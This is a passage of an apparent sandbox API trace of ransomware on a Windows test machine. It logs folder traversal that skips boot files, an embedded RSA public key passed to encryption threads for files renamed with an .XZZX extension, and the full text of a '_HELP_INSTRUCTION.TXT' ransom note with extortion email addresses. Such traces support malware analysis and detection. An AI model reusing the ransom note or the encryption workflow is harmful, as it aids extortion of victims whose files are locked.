MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0254.785] lstrcpyW (in: lpString1=0x17addc, lpString2="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX" | out: lpString1="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX") returned="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX" [0254.785] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0254.785] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x143c [0254.785] Sleep (dwMilliseconds=0x96) [0254.940] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0254.941] lstrcmpW (lpString1="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpString2="..") returned 1 [0254.941] lstrcmpW (lpString1="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpString2=".") returned 1 [0254.941] StrStrW (lpFirst="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0254.941] StrStrW (lpFirst="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpSrch="ntldr") returned 0x0 [0254.941] StrStrW (lpFirst="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpSrch="NTLDR") returned 0x0 [0254.941] StrStrW (lpFirst="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0254.941] StrStrW (lpFirst="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0254.941] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0254.941] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0254.941] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0254.941] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0254.941] lstrcpyW (in: lpString1=0x17addc, lpString2="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX" | out: lpString1="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX") returned="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX" [0254.941] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0254.941] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1440 [0254.941] Sleep (dwMilliseconds=0x96) [0255.096] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0255.096] lstrcmpW (lpString1="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpString2="..") returned 1 [0255.097] lstrcmpW (lpString1="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpString2=".") returned 1 [0255.097] StrStrW (lpFirst="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0255.097] StrStrW (lpFirst="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpSrch="ntldr") returned 0x0 [0255.097] StrStrW (lpFirst="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpSrch="NTLDR") returned 0x0 [0255.097] StrStrW (lpFirst="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0255.097] StrStrW (lpFirst="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpSrch="ntdetect.com") returned 0x0 [0255.097] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0255.097] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0255.097] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0255.097] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0255.097] lstrcpyW (in: lpString1=0x17addc, lpString2="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX" | out: lpString1="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX") returned="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX" [0255.097] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0255.097] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1444 [0255.097] Sleep (dwMilliseconds=0x96) [0255.252] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0255.252] lstrcmpW (lpString1="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpString2="..") returned 1 [0255.252] lstrcmpW (lpString1="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpString2=".") returned 1 [0255.252] StrStrW (lpFirst="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0255.253] StrStrW (lpFirst="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpSrch="ntldr") returned 0x0 [0255.253] StrStrW (lpFirst="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpSrch="NTLDR") returned 0x0 [0255.253] StrStrW (lpFirst="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0255.253] StrStrW (lpFirst="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0255.253] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0255.253] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0255.253] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0255.253] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0255.253] lstrcpyW (in: lpString1=0x17addc, lpString2="D1B4BDC437A182A42497439F3BC266EC.XZZX" | out: lpString1="D1B4BDC437A182A42497439F3BC266EC.XZZX") returned="D1B4BDC437A182A42497439F3BC266EC.XZZX" [0255.253] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0255.253] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1448 [0255.253] Sleep (dwMilliseconds=0x96) [0255.408] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0255.408] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0255.408] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0255.408] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0255.409] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0255.409] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 1 [0255.409] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 0 [0255.409] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o" [0255.409] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*" [0255.409] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0255.409] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0255.409] SetErrorMode (uMode=0x1) returned 0x1 [0255.409] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\_HELP_INSTRUCTION.TXT") returned 97 [0255.409] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0255.409] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0255.409] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x144c) returned 0x0 [0255.409] RegQueryValueExW (in: hKey=0x144c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43ded40, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x43ded40*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0255.409] RegCloseKey (hKey=0x144c) returned 0x0 [0255.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0255.410] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0255.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x144c [0255.410] CloseHandle (hObject=0x144c) returned 1 [0255.410] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0255.410] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o") returned="2SS69ds5b7DlSJShTY0o" [0255.410] lstrcpyW (in: lpString1=0x17a5a4, lpString2="2SS69ds5b7DlSJShTY0o" | out: lpString1="2SS69ds5b7DlSJShTY0o") returned="2SS69ds5b7DlSJShTY0o" [0255.410] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" [0255.410] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0255.410] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpString2="O903hcW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW" [0255.410] SetErrorMode (uMode=0x1) returned 0x1 [0255.410] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW" [0255.410] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0255.410] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0255.410] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*" [0255.410] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0255.410] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW") returned="O903hcW" [0255.410] lstrcpyW (in: lpString1=0x17a5a4, lpString2="O903hcW" | out: lpString1="O903hcW") returned="O903hcW" [0255.410] StrStrW (lpFirst="60CA942226AA4A29961B00962ADF2E71.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0255.410] StrStrW (lpFirst="60CA942226AA4A29961B00962ADF2E71.XZZX", lpSrch="ntldr") returned 0x0 [0255.410] StrStrW (lpFirst="60CA942226AA4A29961B00962ADF2E71.XZZX", lpSrch="NTLDR") returned 0x0 [0255.411] StrStrW (lpFirst="60CA942226AA4A29961B00962ADF2E71.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0255.411] StrStrW (lpFirst="60CA942226AA4A29961B00962ADF2E71.XZZX", lpSrch="ntdetect.com") returned 0x0 [0255.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpSrch="Desktop") returned 0x0 [0255.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpSrch="DESKTOP") returned 0x0 [0255.411] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned 67 [0255.411] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0255.411] lstrcpyW (in: lpString1=0x17addc, lpString2="60CA942226AA4A29961B00962ADF2E71.XZZX" | out: lpString1="60CA942226AA4A29961B00962ADF2E71.XZZX") returned="60CA942226AA4A29961B00962ADF2E71.XZZX" [0255.411] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0255.411] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1454 [0255.411] Sleep (dwMilliseconds=0x96) [0255.564] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0255.564] lstrcmpW (lpString1="E29C4433332B9D3DB3332D67374C8185.XZZX", lpString2="..") returned 1 [0255.565] lstrcmpW (lpString1="E29C4433332B9D3DB3332D67374C8185.XZZX", lpString2=".") returned 1 [0255.565] 